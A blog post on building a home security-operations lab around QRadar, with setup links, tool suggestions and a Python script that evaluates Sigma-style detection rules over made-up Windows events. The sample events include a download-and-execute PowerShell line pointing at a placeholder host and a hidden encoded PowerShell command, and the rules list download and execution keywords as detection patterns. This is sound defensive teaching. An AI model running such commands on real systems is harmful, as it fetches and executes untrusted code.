This blog is all about Cyber Security and IT

Wednesday, March 29, 2023

How to Study Cyber SOC at home in 2023


Below is the complete guide to help you study cyber SOC at home.

Let's install a SIEM first:

There are various SIEMs on the market, such as QRadar, Graylog, ELK, Splunk and SumoLogic, but this guide uses QRadar as the example.

Download: https://lnkd.in/d7ATK9ND
Install: https://lnkd.in/dWe7gZ7f

All the material you need:


If you encounter any of the issues below, I've collected the solutions.

- Install the WinCollect agent another way:
https://lnkd.in/dA34UhEV |
https://lnkd.in/db_7ai_j

- Send Linux logs to QRadar:
https://lnkd.in/dnc6HYw9

- No Log Activity | QRadar CE:
https://lnkd.in/dTa2kFrM

- No Log Activity | QRadar Code:
https://lnkd.in/d3ZSVzx3

- Log source problem:
https://bit.ly/3QyysPD

- Modify the maximum log size using Group Policy:
https://lnkd.in/dmD7jqGK

- Basic rule creation and use case creation in QRadar SIEM:
https://lnkd.in/daWJmTu3 |
https://ibm.co/3DwndEq

✔️ Don't forget to generate an authentication token (from AS) and enter it in the WinCollect agent when you install it.

✔️ Where to find the log and event sources for Windows, Linux, databases, etc.:
- DSM Configuration Guide: https://ibm.co/3dhP9Bl
Does it work? Great! That is a mini SOC. Document it somewhere and link it to your resume.🙏


------> Additional steps: <------

- Increase log visibility (enable PowerShell logging and Script Block Logging, install Sysmon, etc.)

- Install extra tools to get more visibility, e.g. BLUESPAWN, DeepBlueCLI, Suricata, Zeek, RITA (all are on GitHub)

- Test your setup! Be the bad guy and try to catch yourself. (WinPwn, Atomic Red Team, Caldera; again, check out GitHub)

- If needed, improve your SIEM with matching alert rules and build dashboards. (Ideas? Look at Sigma rules on GitHub)
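Before you translate a Sigma rule into a QRadar rule, it helps to see how the Sigma detection layout (field modifiers and a condition over named selections) actually decides whether an event fires. The script below is an added example written for this post; it is not code from QRadar, from the Sigma project or from the tools listed above. It implements only a subset of Sigma (the contains/startswith/endswith/all modifiers and conditions joined by "and" / "and not") and runs two rules over constructed Windows Security 4688 and PowerShell 4104 records. The events, user names, rule titles and the svc_backup exclusion are all made up for the demonstration.

```python
"""Sigma-style detection rules evaluated over constructed Windows event records.

Added example, not QRadar or Sigma project code. Supports a subset of the Sigma
grammar: field modifiers contains/startswith/endswith/all, and a condition made
of named selections joined by 'and' / 'and not'.
"""
from __future__ import annotations

from typing import Any

# Constructed sample events (not real logs). Field names follow Windows
# Security 4688 (process creation) and PowerShell 4104 (Script Block Logging).
SAMPLE_EVENTS: list[dict[str, Any]] = [
    {"EventID": 4688, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe readme.txt", "User": r"LAB\alice"},
    {"EventID": 4688, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBBAEEA", "User": r"LAB\bob"},
    {"EventID": 4104, "ScriptBlockText": "Invoke-WebRequest http://example.invalid/a.ps1 | IEX",
     "User": r"LAB\bob"},
    {"EventID": 4104, "ScriptBlockText": r"Get-ChildItem C:\Temp", "User": r"LAB\alice"},
    # Hypothetical automation account that legitimately runs encoded commands;
    # included to show how a filter tunes out a known false positive.
    {"EventID": 4688, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -enc QQBBAEEA", "User": r"LAB\svc_backup"},
]

# Rules in Sigma's detection layout. Titles and values are constructed.
RULES: list[dict[str, Any]] = [
    {
        "title": "Suspicious PowerShell encoded command",
        "detection": {
            "selection": {
                "EventID": 4688,
                "Image|endswith": r"\powershell.exe",
                "CommandLine|contains|all": ["-enc", "hidden"],
            },
            "filter": {"User|startswith": r"LAB\svc_"},
            "condition": "selection and not filter",
        },
    },
    {
        "title": "Script block downloads and executes content",
        "detection": {
            "selection_download": {
                "EventID": 4104,
                "ScriptBlockText|contains": ["Invoke-WebRequest", "DownloadString", "Net.WebClient"],
            },
            "selection_exec": {"ScriptBlockText|contains": ["IEX", "Invoke-Expression"]},
            "condition": "selection_download and selection_exec",
        },
    },
]


def _match_value(value: Any, pattern: Any, modifiers: list[str]) -> bool:
    """Compare one event value with one pattern, case-insensitively, as Sigma does."""
    if value is None:
        return False
    v, p = str(value).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return p in v
    if "startswith" in modifiers:
        return v.startswith(p)
    if "endswith" in modifiers:
        return v.endswith(p)
    return v == p


def _field_matches(event: dict[str, Any], key: str, expected: Any) -> bool:
    """'Field|mod1|mod2': a list of patterns is OR-ed unless the 'all' modifier is present."""
    field, *modifiers = key.split("|")
    patterns = expected if isinstance(expected, list) else [expected]
    results = [_match_value(event.get(field), p, modifiers) for p in patterns]
    return all(results) if "all" in modifiers else any(results)


def selection_matches(event: dict[str, Any], selection: dict[str, Any]) -> bool:
    """Every field in a selection map must match (logical AND)."""
    return all(_field_matches(event, k, v) for k, v in selection.items())


def rule_matches(event: dict[str, Any], rule: dict[str, Any]) -> bool:
    """Evaluate a condition of named selections joined by 'and' / 'and not'.

    Subset of Sigma: no 'or', parentheses or aggregation expressions.
    """
    detection = rule["detection"]
    for term in detection["condition"].split(" and "):
        term = term.strip()
        negate = term.startswith("not ")
        name = term[4:].strip() if negate else term
        if selection_matches(event, detection[name]) == negate:
            return False
    return True


def run_rules(events: list[dict[str, Any]], rules: list[dict[str, Any]]) -> list[tuple[int, str]]:
    """Return (event index, rule title) for every event/rule pair that fires."""
    return [(i, rule["title"]) for i, event in enumerate(events)
            for rule in rules if rule_matches(event, rule)]


if __name__ == "__main__":
    for index, title in run_rules(SAMPLE_EVENTS, RULES):
        print(f"ALERT event[{index}] user={SAMPLE_EVENTS[index]['User']}: {title}")
```

Running it fires on the hidden encoded command from bob and on the download-and-execute script block, while the same encoded command from the excluded svc_backup account stays quiet: the filter selection is what turns a noisy rule into a usable one. When you rebuild such a rule in QRadar, keep the same structure (positive selection, then explicit exclusions) so the tuning decision stays visible in the rule rather than buried in a log source change.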

